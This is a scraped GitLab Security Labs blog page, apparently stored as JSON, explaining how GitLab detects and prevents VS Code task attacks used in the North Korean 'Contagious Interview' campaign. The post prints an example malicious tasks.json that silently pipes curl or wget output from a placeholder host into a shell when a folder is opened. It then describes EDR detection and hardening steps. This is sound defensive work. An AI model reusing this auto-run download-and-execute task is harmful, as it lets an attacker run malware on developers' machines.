[{"data":1,"prerenderedAt":809},["ShallowReactive",2],{"/en-us/blog/categories/security-labs":3,"navigation-en-us":21,"banner-en-us":442,"footer-en-us":452,"security-labs-category-page-total-items-en-us":694,"security-labs-category-page-featured-en-us":695,"security-labs-category-page-1-en-us":727},{"id":4,"title":5,"body":6,"category":6,"config":7,"content":12,"description":6,"extension":14,"meta":15,"navigation":9,"path":16,"seo":17,"slug":6,"stem":19,"testContent":6,"type":6,"__hash__":20},"blogCategories/en-us/blog/categories/security-labs.yml","Security Labs",null,{"template":8,"isCustomCategory":9,"slug":10,"hide":11},"BlogCategory",true,"security-labs",false,{"name":5,"description":13},"Learn about cybersecurity trends, best practices, and third-party threats to secure your code and digital infrastructure.","yml",{},"/en-us/blog/categories/security-labs",{"title":5,"description":18},"Browse articles related to Security Labs on the GitLab Blog","en-us/blog/categories/security-labs","R7W9jD38ydCqWBR5-wSYze-Orc17_eSeMP_60gUwCVg",{"logo":22,"freeTrial":27,"sales":32,"login":37,"items":42,"search":362,"minimal":393,"duo":412,"switchNav":421,"pricingDeployment":432},{"config":23},{"href":24,"dataGaName":25,"dataGaLocation":26},"/","gitlab logo","header",{"text":28,"config":29},"Get free trial",{"href":30,"dataGaName":31,"dataGaLocation":26},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com&glm_content=default-saas-trial/","free trial",{"text":33,"config":34},"Talk to sales",{"href":35,"dataGaName":36,"dataGaLocation":26},"/sales/","sales",{"text":38,"config":39},"Sign in",{"href":40,"dataGaName":41,"dataGaLocation":26},"https://gitlab.com/users/sign_in/","sign in",[43,72,172,177,281,342],{"text":44,"config":45,"menu":47},"Platform",{"dataNavLevelOne":46},"platform",{"type":48,"columns":49},"cards",[50,56,64],{"title":44,"description":51,"link":52},"The intelligent orchestration platform for DevSecOps",{"text":53,"config":54},"Explore our 
Platform",{"href":55,"dataGaName":46,"dataGaLocation":26},"/platform/",{"title":57,"description":58,"link":59},"GitLab Duo Agent Platform","Agentic AI for the entire software lifecycle",{"text":60,"config":61},"Meet GitLab Duo",{"href":62,"dataGaName":63,"dataGaLocation":26},"/gitlab-duo-agent-platform/","gitlab duo agent platform",{"title":65,"description":66,"link":67},"Why GitLab","See the top reasons enterprises choose GitLab",{"text":68,"config":69},"Learn more",{"href":70,"dataGaName":71,"dataGaLocation":26},"/why-gitlab/","why gitlab",{"text":73,"left":9,"config":74,"menu":76},"Product",{"dataNavLevelOne":75},"solutions",{"type":77,"link":78,"columns":82,"feature":151},"lists",{"text":79,"config":80},"View all Solutions",{"href":81,"dataGaName":75,"dataGaLocation":26},"/solutions/",[83,107,130],{"title":84,"description":85,"link":86,"items":91},"Automation","CI/CD and automation to accelerate deployment",{"config":87},{"icon":88,"href":89,"dataGaName":90,"dataGaLocation":26},"AutomatedCodeAlt","/solutions/delivery-automation/","automated software delivery",[92,96,99,103],{"text":93,"config":94},"CI/CD",{"href":95,"dataGaLocation":26,"dataGaName":93},"/solutions/continuous-integration/",{"text":57,"config":97},{"href":62,"dataGaLocation":26,"dataGaName":98},"gitlab duo agent platform - product menu",{"text":100,"config":101},"Source Code Management",{"href":102,"dataGaLocation":26,"dataGaName":100},"/solutions/source-code-management/",{"text":104,"config":105},"Automated Software Delivery",{"href":89,"dataGaLocation":26,"dataGaName":106},"Automated software delivery",{"title":108,"description":109,"link":110,"items":115},"Security","Deliver code faster without compromising security",{"config":111},{"href":112,"dataGaName":113,"dataGaLocation":26,"icon":114},"/solutions/application-security-testing/","security and compliance","ShieldCheckLight",[116,120,125],{"text":117,"config":118},"Application Security 
Testing",{"href":112,"dataGaName":119,"dataGaLocation":26},"Application security testing",{"text":121,"config":122},"Software Supply Chain Security",{"href":123,"dataGaLocation":26,"dataGaName":124},"/solutions/supply-chain/","Software supply chain security",{"text":126,"config":127},"Software Compliance",{"href":128,"dataGaName":129,"dataGaLocation":26},"/solutions/software-compliance/","software compliance",{"title":131,"link":132,"items":137},"Measurement",{"config":133},{"icon":134,"href":135,"dataGaName":136,"dataGaLocation":26},"DigitalTransformation","/solutions/visibility-measurement/","visibility and measurement",[138,142,146],{"text":139,"config":140},"Visibility & Measurement",{"href":135,"dataGaLocation":26,"dataGaName":141},"Visibility and Measurement",{"text":143,"config":144},"Value Stream Management",{"href":145,"dataGaLocation":26,"dataGaName":143},"/solutions/value-stream-management/",{"text":147,"config":148},"Analytics & Insights",{"href":149,"dataGaLocation":26,"dataGaName":150},"/solutions/analytics-and-insights/","Analytics and insights",{"title":152,"type":77,"items":153},"GitLab for",[154,160,166],{"text":155,"config":156},"Enterprise",{"icon":157,"href":158,"dataGaLocation":26,"dataGaName":159},"Building","/enterprise/","enterprise",{"text":161,"config":162},"Small Business",{"icon":163,"href":164,"dataGaLocation":26,"dataGaName":165},"Work","/small-business/","small business",{"text":167,"config":168},"Public Sector",{"icon":169,"href":170,"dataGaLocation":26,"dataGaName":171},"Organization","/solutions/public-sector/","public sector",{"text":173,"config":174},"Pricing",{"href":175,"dataGaName":176,"dataGaLocation":26,"dataNavLevelOne":176},"/pricing/","pricing",{"text":178,"config":179,"menu":181},"Resources",{"dataNavLevelOne":180},"resources",{"type":77,"link":182,"columns":186,"feature":270},{"text":183,"config":184},"View all 
resources",{"href":185,"dataGaName":180,"dataGaLocation":26},"/resources/",[187,220,242],{"title":188,"items":189},"Getting started",[190,195,200,205,210,215],{"text":191,"config":192},"Install",{"href":193,"dataGaName":194,"dataGaLocation":26},"/install/","install",{"text":196,"config":197},"Quick start guides",{"href":198,"dataGaName":199,"dataGaLocation":26},"/get-started/","quick setup checklists",{"text":201,"config":202},"Learn",{"href":203,"dataGaLocation":26,"dataGaName":204},"https://university.gitlab.com/","learn",{"text":206,"config":207},"Product documentation",{"href":208,"dataGaName":209,"dataGaLocation":26},"https://docs.gitlab.com/","product documentation",{"text":211,"config":212},"Best practice videos",{"href":213,"dataGaName":214,"dataGaLocation":26},"/getting-started-videos/","best practice videos",{"text":216,"config":217},"Integrations",{"href":218,"dataGaName":219,"dataGaLocation":26},"/integrations/","integrations",{"title":221,"items":222},"Discover",[223,228,233,237],{"text":224,"config":225},"Customer success stories",{"href":226,"dataGaName":227,"dataGaLocation":26},"/customers/","customer success stories",{"text":229,"config":230},"Blog",{"href":231,"dataGaName":232,"dataGaLocation":26},"/blog/","blog",{"text":234,"config":235},"The Source",{"href":236,"dataGaName":232,"dataGaLocation":26},"/the-source/",{"text":238,"config":239},"Remote",{"href":240,"dataGaName":241,"dataGaLocation":26},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"title":243,"items":244},"Connect",[245,250,255,260,265],{"text":246,"config":247},"GitLab 
Services",{"href":248,"dataGaName":249,"dataGaLocation":26},"/services/","services",{"text":251,"config":252},"Community",{"href":253,"dataGaName":254,"dataGaLocation":26},"/community/","community",{"text":256,"config":257},"Forum",{"href":258,"dataGaName":259,"dataGaLocation":26},"https://forum.gitlab.com/","forum",{"text":261,"config":262},"Events",{"href":263,"dataGaName":264,"dataGaLocation":26},"/events/","events",{"text":266,"config":267},"Partners",{"href":268,"dataGaName":269,"dataGaLocation":26},"/partners/","partners",{"config":271,"title":274,"text":275,"link":276},{"background":272,"textColor":273},"url('https://res.cloudinary.com/about-gitlab-com/image/upload/v1777322348/qpq8yrgn8knii57omj0c.png')","#000","What’s new in GitLab","Stay updated with our latest features and improvements.",{"text":277,"config":278},"Read the latest",{"href":279,"dataGaName":280,"dataGaLocation":26},"/releases/whats-new/","whats new",{"text":282,"config":283,"menu":285},"Company",{"dataNavLevelOne":284},"company",{"type":77,"columns":286},[287],{"items":288},[289,294,300,302,307,312,317,322,327,332,337],{"text":290,"config":291},"About",{"href":292,"dataGaName":293,"dataGaLocation":26},"/company/","about",{"text":295,"config":296,"footerGa":299},"Jobs",{"href":297,"dataGaName":298,"dataGaLocation":26},"/jobs/","jobs",{"dataGaName":298},{"text":261,"config":301},{"href":263,"dataGaName":264,"dataGaLocation":26},{"text":303,"config":304},"Leadership",{"href":305,"dataGaName":306,"dataGaLocation":26},"/company/team/e-group/","leadership",{"text":308,"config":309},"Team",{"href":310,"dataGaName":311,"dataGaLocation":26},"/company/team/","team",{"text":313,"config":314},"Handbook",{"href":315,"dataGaName":316,"dataGaLocation":26},"https://handbook.gitlab.com/","handbook",{"text":318,"config":319},"Investor relations",{"href":320,"dataGaName":321,"dataGaLocation":26},"https://ir.gitlab.com/","investor relations",{"text":323,"config":324},"Trust 
Center",{"href":325,"dataGaName":326,"dataGaLocation":26},"/security/","trust center",{"text":328,"config":329},"AI Transparency Center",{"href":330,"dataGaName":331,"dataGaLocation":26},"/ai-transparency-center/","ai transparency center",{"text":333,"config":334},"Newsletter",{"href":335,"dataGaName":336,"dataGaLocation":26},"/company/contact/#contact-forms","newsletter",{"text":338,"config":339},"Press",{"href":340,"dataGaName":341,"dataGaLocation":26},"/press/","press",{"text":343,"config":344,"menu":345},"Contact us",{"dataNavLevelOne":284},{"type":77,"columns":346},[347],{"items":348},[349,352,357],{"text":33,"config":350},{"href":35,"dataGaName":351,"dataGaLocation":26},"talk to sales",{"text":353,"config":354},"Support portal",{"href":355,"dataGaName":356,"dataGaLocation":26},"https://support.gitlab.com","support portal",{"text":358,"config":359},"Customer portal",{"href":360,"dataGaName":361,"dataGaLocation":26},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":363,"login":364,"suggestions":371},"Close",{"text":365,"link":366},"To search repositories and projects, login to",{"text":367,"config":368},"gitlab.com",{"href":40,"dataGaName":369,"dataGaLocation":370},"search login","search",{"text":372,"default":373},"Suggestions",[374,376,380,382,386,390],{"text":57,"config":375},{"href":62,"dataGaName":57,"dataGaLocation":370},{"text":377,"config":378},"Code Suggestions (AI)",{"href":379,"dataGaName":377,"dataGaLocation":370},"/solutions/code-suggestions/",{"text":93,"config":381},{"href":95,"dataGaName":93,"dataGaLocation":370},{"text":383,"config":384},"GitLab on AWS",{"href":385,"dataGaName":383,"dataGaLocation":370},"/partners/technology-partners/aws/",{"text":387,"config":388},"GitLab on Google Cloud",{"href":389,"dataGaName":387,"dataGaLocation":370},"/partners/technology-partners/google-cloud-platform/",{"text":391,"config":392},"Why 
GitLab?",{"href":70,"dataGaName":391,"dataGaLocation":370},{"freeTrial":394,"mobileIcon":399,"desktopIcon":404,"secondaryButton":407},{"text":395,"config":396},"Start free trial",{"href":397,"dataGaName":31,"dataGaLocation":398},"https://gitlab.com/-/trials/new/","nav",{"altText":400,"config":401},"Gitlab Icon",{"src":402,"dataGaName":403,"dataGaLocation":398},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203874/jypbw1jx72aexsoohd7x.svg","gitlab icon",{"altText":400,"config":405},{"src":406,"dataGaName":403,"dataGaLocation":398},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203875/gs4c8p8opsgvflgkswz9.svg",{"text":408,"config":409},"Get Started",{"href":410,"dataGaName":411,"dataGaLocation":398},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/get-started/","get started",{"freeTrial":413,"mobileIcon":417,"desktopIcon":419},{"text":414,"config":415},"Learn more about GitLab Duo",{"href":62,"dataGaName":416,"dataGaLocation":398},"gitlab duo",{"altText":400,"config":418},{"src":402,"dataGaName":403,"dataGaLocation":398},{"altText":400,"config":420},{"src":406,"dataGaName":403,"dataGaLocation":398},{"button":422,"mobileIcon":427,"desktopIcon":429},{"text":423,"config":424},"/switch",{"href":425,"dataGaName":426,"dataGaLocation":398},"#contact","switch",{"altText":400,"config":428},{"src":402,"dataGaName":403,"dataGaLocation":398},{"altText":400,"config":430},{"src":431,"dataGaName":403,"dataGaLocation":398},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1773335277/ohhpiuoxoldryzrnhfrh.png",{"freeTrial":433,"mobileIcon":438,"desktopIcon":440},{"text":434,"config":435},"Back to pricing",{"href":175,"dataGaName":436,"dataGaLocation":398,"icon":437},"back to pricing","GoBack",{"altText":400,"config":439},{"src":402,"dataGaName":403,"dataGaLocation":398},{"altText":400,"config":441},{"src":406,"dataGaName":403,"dataGaLocation":398},{"title":443,"button":444,"config":449},"See how agentic AI transforms 
software delivery",{"text":445,"config":446},"Sign up for GitLab Transcend on June 10",{"href":447,"dataGaName":448,"dataGaLocation":26},"/releases/whats-new/#sign-up","transcend event",{"layout":450,"icon":451,"disabled":11},"release","AiStar",{"data":453},{"text":454,"source":455,"edit":461,"contribute":466,"config":471,"items":476,"minimal":683},"Git is a trademark of Software Freedom Conservancy and our use of 'GitLab' is under license",{"text":456,"config":457},"View page source",{"href":458,"dataGaName":459,"dataGaLocation":460},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":462,"config":463},"Edit this page",{"href":464,"dataGaName":465,"dataGaLocation":460},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":467,"config":468},"Please contribute",{"href":469,"dataGaName":470,"dataGaLocation":460},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":472,"facebook":473,"youtube":474,"linkedin":475},"https://twitter.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[477,524,578,622,649],{"title":173,"links":478,"subMenu":493},[479,483,488],{"text":480,"config":481},"View plans",{"href":175,"dataGaName":482,"dataGaLocation":460},"view plans",{"text":484,"config":485},"Why Premium?",{"href":486,"dataGaName":487,"dataGaLocation":460},"/pricing/premium/","why premium",{"text":489,"config":490},"Why Ultimate?",{"href":491,"dataGaName":492,"dataGaLocation":460},"/pricing/ultimate/","why ultimate",[494],{"title":495,"links":496},"Contact Us",[497,500,502,504,509,514,519],{"text":498,"config":499},"Contact 
sales",{"href":35,"dataGaName":36,"dataGaLocation":460},{"text":353,"config":501},{"href":355,"dataGaName":356,"dataGaLocation":460},{"text":358,"config":503},{"href":360,"dataGaName":361,"dataGaLocation":460},{"text":505,"config":506},"Status",{"href":507,"dataGaName":508,"dataGaLocation":460},"https://status.gitlab.com/","status",{"text":510,"config":511},"Terms of use",{"href":512,"dataGaName":513,"dataGaLocation":460},"/terms/","terms of use",{"text":515,"config":516},"Privacy statement",{"href":517,"dataGaName":518,"dataGaLocation":460},"/privacy/","privacy statement",{"text":520,"config":521},"Cookie preferences",{"dataGaName":522,"dataGaLocation":460,"id":523,"isOneTrustButton":9},"cookie preferences","ot-sdk-btn",{"title":73,"links":525,"subMenu":534},[526,530],{"text":527,"config":528},"DevSecOps platform",{"href":55,"dataGaName":529,"dataGaLocation":460},"devsecops platform",{"text":531,"config":532},"AI-Assisted Development",{"href":62,"dataGaName":533,"dataGaLocation":460},"ai-assisted development",[535],{"title":536,"links":537},"Topics",[538,543,548,553,558,563,568,573],{"text":539,"config":540},"CICD",{"href":541,"dataGaName":542,"dataGaLocation":460},"/topics/ci-cd/","cicd",{"text":544,"config":545},"GitOps",{"href":546,"dataGaName":547,"dataGaLocation":460},"/topics/gitops/","gitops",{"text":549,"config":550},"DevOps",{"href":551,"dataGaName":552,"dataGaLocation":460},"/topics/devops/","devops",{"text":554,"config":555},"Version Control",{"href":556,"dataGaName":557,"dataGaLocation":460},"/topics/version-control/","version control",{"text":559,"config":560},"DevSecOps",{"href":561,"dataGaName":562,"dataGaLocation":460},"/topics/devsecops/","devsecops",{"text":564,"config":565},"Cloud Native",{"href":566,"dataGaName":567,"dataGaLocation":460},"/topics/cloud-native/","cloud native",{"text":569,"config":570},"AI for Coding",{"href":571,"dataGaName":572,"dataGaLocation":460},"/topics/devops/ai-for-coding/","ai for 
coding",{"text":574,"config":575},"Agentic AI",{"href":576,"dataGaName":577,"dataGaLocation":460},"/topics/agentic-ai/","agentic ai",{"title":579,"links":580},"Solutions",[581,583,585,590,594,597,601,604,606,609,612,617],{"text":117,"config":582},{"href":112,"dataGaName":117,"dataGaLocation":460},{"text":106,"config":584},{"href":89,"dataGaName":90,"dataGaLocation":460},{"text":586,"config":587},"Agile development",{"href":588,"dataGaName":589,"dataGaLocation":460},"/solutions/agile-delivery/","agile delivery",{"text":591,"config":592},"SCM",{"href":102,"dataGaName":593,"dataGaLocation":460},"source code management",{"text":539,"config":595},{"href":95,"dataGaName":596,"dataGaLocation":460},"continuous integration & delivery",{"text":598,"config":599},"Value stream management",{"href":145,"dataGaName":600,"dataGaLocation":460},"value stream management",{"text":544,"config":602},{"href":603,"dataGaName":547,"dataGaLocation":460},"/solutions/gitops/",{"text":155,"config":605},{"href":158,"dataGaName":159,"dataGaLocation":460},{"text":607,"config":608},"Small business",{"href":164,"dataGaName":165,"dataGaLocation":460},{"text":610,"config":611},"Public sector",{"href":170,"dataGaName":171,"dataGaLocation":460},{"text":613,"config":614},"Education",{"href":615,"dataGaName":616,"dataGaLocation":460},"/solutions/education/","education",{"text":618,"config":619},"Financial services",{"href":620,"dataGaName":621,"dataGaLocation":460},"/solutions/finance/","financial 
services",{"title":178,"links":623},[624,626,628,630,633,635,637,639,641,643,645,647],{"text":191,"config":625},{"href":193,"dataGaName":194,"dataGaLocation":460},{"text":196,"config":627},{"href":198,"dataGaName":199,"dataGaLocation":460},{"text":201,"config":629},{"href":203,"dataGaName":204,"dataGaLocation":460},{"text":206,"config":631},{"href":208,"dataGaName":632,"dataGaLocation":460},"docs",{"text":229,"config":634},{"href":231,"dataGaName":232,"dataGaLocation":460},{"text":224,"config":636},{"href":226,"dataGaName":227,"dataGaLocation":460},{"text":238,"config":638},{"href":240,"dataGaName":241,"dataGaLocation":460},{"text":246,"config":640},{"href":248,"dataGaName":249,"dataGaLocation":460},{"text":251,"config":642},{"href":253,"dataGaName":254,"dataGaLocation":460},{"text":256,"config":644},{"href":258,"dataGaName":259,"dataGaLocation":460},{"text":261,"config":646},{"href":263,"dataGaName":264,"dataGaLocation":460},{"text":266,"config":648},{"href":268,"dataGaName":269,"dataGaLocation":460},{"title":282,"links":650},[651,653,655,657,659,661,663,667,672,674,676,678],{"text":290,"config":652},{"href":292,"dataGaName":284,"dataGaLocation":460},{"text":295,"config":654},{"href":297,"dataGaName":298,"dataGaLocation":460},{"text":303,"config":656},{"href":305,"dataGaName":306,"dataGaLocation":460},{"text":308,"config":658},{"href":310,"dataGaName":311,"dataGaLocation":460},{"text":313,"config":660},{"href":315,"dataGaName":316,"dataGaLocation":460},{"text":318,"config":662},{"href":320,"dataGaName":321,"dataGaLocation":460},{"text":664,"config":665},"Sustainability",{"href":666,"dataGaName":664,"dataGaLocation":460},"/sustainability/",{"text":668,"config":669},"Diversity, inclusion and belonging (DIB)",{"href":670,"dataGaName":671,"dataGaLocation":460},"/diversity-inclusion-belonging/","Diversity, inclusion and 
belonging",{"text":323,"config":673},{"href":325,"dataGaName":326,"dataGaLocation":460},{"text":333,"config":675},{"href":335,"dataGaName":336,"dataGaLocation":460},{"text":338,"config":677},{"href":340,"dataGaName":341,"dataGaLocation":460},{"text":679,"config":680},"Modern Slavery Transparency Statement",{"href":681,"dataGaName":682,"dataGaLocation":460},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"items":684},[685,688,691],{"text":686,"config":687},"Terms",{"href":512,"dataGaName":513,"dataGaLocation":460},{"text":689,"config":690},"Cookies",{"dataGaName":522,"dataGaLocation":460,"id":523,"isOneTrustButton":9},{"text":692,"config":693},"Privacy",{"href":517,"dataGaName":518,"dataGaLocation":460},16,{"id":696,"title":697,"authorSlugs":698,"authors":700,"body":702,"category":10,"categorySlug":10,"config":703,"content":706,"date":710,"description":707,"extension":14,"externalUrl":6,"featured":11,"heroImage":709,"isFeatured":11,"meta":716,"navigation":9,"path":717,"publishedDate":710,"rawbody":718,"seo":719,"slug":705,"stem":722,"tagSlugs":723,"tags":725,"template":704,"updatedDate":6,"__hash__":726},"blogPosts/en-us/blog/how-to-detect-and-prevent-contagious-interview-ide-attacks.yml","How to detect and prevent Contagious Interview IDE attacks",[699],"josh-feehs",[701],"Josh Feehs","Recently, GitLab's Threat Intelligence team, part of the Security Operations team, published an [extensive article](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/) revealing North Korean tradecraft and detailing ways in which GitLab has tracked and disrupted these malicious actors. Security Operations here also includes our Security Incident Response Team (SIRT), Security Logging, Signals Intelligence, and Red Team. 
This tight collaboration across security disciplines allows us to take tips from threat intelligence, emulate relevant threat actors via Red and Purple Team exercises, and proactively build detection and prevention techniques based on that activity.\n\nSo, in parallel with the discovery of the North Korean tradecraft and associated [Contagious Interview](https://attack.mitre.org/groups/G1052/) threat campaign, we developed custom controls to prevent similar malware campaigns, specifically those which use IDE attacks. In this article, we share those controls as well as the techniques we use to protect our customers, support the broader security community, and further thwart these malicious actors.\n\n## The threat intelligence\n\nThe North Korean tradecraft article focused on a broad set of attacks, techniques, and Indicators of Compromise (IOCs) that North Korean state actors are actively using to conduct both broad and targeted attacks. One of [the attack paths noted](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/#_2025-campaign-trends) was the use of Visual Studio Code tasks for malware distribution. The [Contagious Interview](https://attack.mitre.org/groups/G1052/) threat campaign often relies on fake interview processes to convince their victims to download and open a code repository, enabling attack via VS Code tasks.\n\n[VS Code tasks](https://code.visualstudio.com/docs/debugtest/tasks) are a mechanism designed to automate common jobs that developers want to run when opening a repository, such as linting, building, packaging, testing, or deploying software systems. Via a simple configuration file within the repo, `tasks.json`, developers can automatically run code whenever they open their repository. 
Trust must be granted to the repository for these tasks to run.\n\nContagious Interview’s pretexts often rely on malicious repositories, so pivoting to using VS Code tasks for code execution is a simple continuation of their pretext. The target is prompted to download and open the malicious repository in VS Code (often for code review purposes as part of an interview). Because the victims believe they are interviewing for a job, the victim is under heavy pressure to “trust” the interviewer’s workspace, enabling the malicious task to run without their knowledge.\n\nOne example of a malicious `tasks.json` file is shown below. It is fairly simple — it detects the OS and downloads the next stage of the malware for that platform, using a `curl | bash` structure. Domains included are placeholders and not actual IOCs. Detailed IOCs for these actors were shared in our [previous blog post](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/#appendix-2-indicators-of-compromise).\n\n\n```json\n  \"version\": \"1.0.8\",\n  \"tasks\": [\n    {\n      \"label\": \"env\",\n      \"type\": \"shell\",\n      \"osx\": {\n        \"command\": \"curl 'https://www.example[.]com/settings/mac?flag=8' | bash\"\n      },\n      \"linux\": {\n        \"command\": \"wget -q0- 'https://www.example[.]com/settings/linux?flag=8' | sh\"\n      },\n      \"windows\": {\n        \"command\": \"curl https://www.example[.]com/settings/windows?flag=8 | cmd\"\n      },\n      \"problemMatcher\": [],\n      \"presentation\": {\n        \"reveal\": \"never\",\n        \"echo\": false,\n        \"focus\": false,\n        \"close\": true,\n        \"panel\": \"dedicated\",\n        \"showReuseMessage\": false\n      },\n      \"runOptions\": {\n        \"runOn\": \"folderOpen\"\n      }\n    }\n  ]\n```\n\nThis malicious code execution is then typically used to deploy infostealers, steal passwords and cryptocurrency, and ultimately establish persistence to abuse 
victims’ trusted accesses to corporate networks.\n\nOnce we understood how the threat actor was gaining initial code execution, we had a target for preventative measures to catch these attacks before GitLab workstations were targeted.\n\n## Multi-faceted detection and prevention\n\nWe always want to develop detective and preventative controls that are as “low level” as possible, since these types of detections are typically more difficult to bypass. Additionally, threat intelligence indicated that other projects that forked VS Code are also vulnerable to this malicious repository attack. So, instead of focusing specifically on a VS Code detection, we wanted to find the area “closest to the operating system” where this malicious code execution could be identified. This would allow our detection techniques to detect not only exploitation via VS Code tasks, but also attacks targeting using a VS Code fork or similar IDE written in Node that has background tasks.  \n   \nReviewing VS Code source, we identified that the `node-pty.spawn()` library call is used across the product when subprocesses need to be used. The [node-pty library](https://www.npmjs.com/package/node-pty) is incredibly popular, with over a million weekly downloads at time of writing. This library enables Node applications (including Electron applications such as VS Code) to fork subprocesses from a node context, and results in calls to its own binary, `spawn-helper`. When subprocesses are launched, `spawn-helper` is spawned as a child process of the Node application calling it.\n\nAfter performing a Purple Team operation to emulate this specific attack path, we reviewed our Endpoint Detection and Response (EDR) telemetry to try to not only develop a strong detection for the emulated attack, but also to tune this detection to only alert on suspicious activity, and not on legitimate developer activity. 
We identified that `spawn-helper` is called in situations where VS Code wants to spawn tasks that occur in the *background*, without user visibility or interaction. Conversely, a `Code Helper` binary is called when new processes (such as the integrated Terminal) are launched in the *foreground* with user interaction.\n\nThis allows us to craft detections that only look for subprocesses spawned without the user’s knowledge, and avoid false positives that flag subprocesses a user might intentionally spawn while using their IDE.\n\nAs shown earlier, a commonly-seen malicious task contains commands that run a `curl | \u003Cshell>` from a task. Although `curl | bash` can be a legitimate way to install software like Homebrew, in our environment, it should never happen in the background without the user’s knowledge. This distinction allowed us to tune `spawn-helper`\\-based detections to not alert on *every* background task that ran, but to instead trigger only on behaviors that are uncommon and suspicious in our environment. Since implementing this detection technique, we have had no false positives, even though a large part of our organization uses VS Code daily.\n\nAlthough this article has focused on detecting `spawn-helper` in your environment, this is only one of many layers of defense that you can implement in your organization to prevent and detect these IDE task-based attacks.\n\nIn addition to using EDR instrumentation to detect a malicious task at runtime, you can proactively harden your fleet against this type of attack by pushing global configs to disable task runs in VS Code. 
If that is too disruptive to your developers, you can also scan your environment to enumerate how often users use trusted workspaces and trusted workspace folders within their typical VS Code usage, and run education campaigns to help inform the company about the risks posed by this Contagious Interview attack path.\n\n## Summary\n\nGitLab Security Operations works around the clock to protect our customers and our company. With our tightly coupled security teams, we are able to produce actionable threat intelligence, leverage that threat intel to inform adversary emulation operations, and ultimately develop technical and procedural prevention and detection techniques that protect our customers and company.\n\nAs VS Code tasks continue to receive visibility in the security community, it’s possible that other threat actors will attempt to use this attack path for their own ends. We hope that this small example of the work we do to protect GitLab and our customers against Advanced Persistent Threats can inspire others to do the same, and to join us in our continued mission to disrupt these threat actors. 
\n\n> Follow our innovation and research on our [Security Labs site](https://about.gitlab.com/blog/categories/security-labs/).",{"featured":11,"template":704,"slug":705},"BlogPost","how-to-detect-and-prevent-contagious-interview-ide-attacks",{"title":697,"description":707,"authors":708,"heroImage":709,"date":710,"body":702,"category":10,"tags":711},"Learn how we built custom controls that detect and prevent malware campaigns like those used for Contagious Interview and how to deploy them in your environment.",[701],"https://res.cloudinary.com/about-gitlab-com/image/upload/v1774375772/kpaaaiqhokevxxeoxvu0.png","2026-05-04",[712,713,714,715],"security","security research","product","tutorial",{},"/en-us/blog/how-to-detect-and-prevent-contagious-interview-ide-attacks","seo:\n  config:\n    noIndex: false\n  title: How to detect and prevent Contagious Interview IDE attacks\n  description: Learn how we built custom controls that detect and prevent malware\n    campaigns like those used for Contagious Interview.\ncontent:\n  title: How to detect and prevent Contagious Interview IDE attacks\n  description: Learn how we built custom controls that detect and prevent malware\n    campaigns like those used for Contagious Interview and how to deploy them in\n    your environment.\n  authors:\n    - Josh Feehs\n  heroImage: https://res.cloudinary.com/about-gitlab-com/image/upload/v1774375772/kpaaaiqhokevxxeoxvu0.png\n  date: 2026-05-04\n  body: >-\n    Recently, GitLab's Threat Intelligence team, part of the Security Operations\n    team, published an [extensive\n    article](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/)\n    revealing North Korean tradecraft and detailing ways in which GitLab has\n    tracked and disrupted these malicious actors. Security Operations here also\n    includes our Security Incident Response Team (SIRT), Security Logging,\n    Signals Intelligence, and Red Team. 
This tight collaboration across security\n    disciplines allows us to take tips from threat intelligence, emulate\n    relevant threat actors via Red and Purple Team exercises, and proactively\n    build detection and prevention techniques based on that activity.\n\n\n    So, in parallel with the discovery of the North Korean tradecraft and associated [Contagious Interview](https://attack.mitre.org/groups/G1052/) threat campaign, we developed custom controls to prevent similar malware campaigns, specifically those which use IDE attacks. In this article, we share those controls as well as the techniques we use to protect our customers, support the broader security community, and further thwart these malicious actors.\n\n\n    ## The threat intelligence\n\n\n    The North Korean tradecraft article focused on a broad set of attacks, techniques, and Indicators of Compromise (IOCs) that North Korean state actors are actively using to conduct both broad and targeted attacks. One of [the attack paths noted](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/#_2025-campaign-trends) was the use of Visual Studio Code tasks for malware distribution. The [Contagious Interview](https://attack.mitre.org/groups/G1052/) threat campaign often relies on fake interview processes to convince their victims to download and open a code repository, enabling attack via VS Code tasks.\n\n\n    [VS Code tasks](https://code.visualstudio.com/docs/debugtest/tasks) are a mechanism designed to automate common jobs that developers want to run when opening a repository, such as linting, building, packaging, testing, or deploying software systems. Via a simple configuration file within the repo, `tasks.json`, developers can automatically run code whenever they open their repository. 
Trust must be granted to the repository for these tasks to run.\n\n\n    Contagious Interview’s pretexts often rely on malicious repositories, so pivoting to using VS Code tasks for code execution is a simple continuation of their pretext. The target is prompted to download and open the malicious repository in VS Code (often for code review purposes as part of an interview). Because the victims believe they are interviewing for a job, the victim is under heavy pressure to “trust” the interviewer’s workspace, enabling the malicious task to run without their knowledge.\n\n\n    One example of a malicious `tasks.json` file is shown below. It is fairly simple — it detects the OS and downloads the next stage of the malware for that platform, using a `curl | bash` structure. Domains included are placeholders and not actual IOCs. Detailed IOCs for these actors were shared in our [previous blog post](https://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/#appendix-2-indicators-of-compromise).\n\n\n\n    ```json\n      \"version\": \"1.0.8\",\n      \"tasks\": [\n        {\n          \"label\": \"env\",\n          \"type\": \"shell\",\n          \"osx\": {\n            \"command\": \"curl 'https://www.example[.]com/settings/mac?flag=8' | bash\"\n          },\n          \"linux\": {\n            \"command\": \"wget -q0- 'https://www.example[.]com/settings/linux?flag=8' | 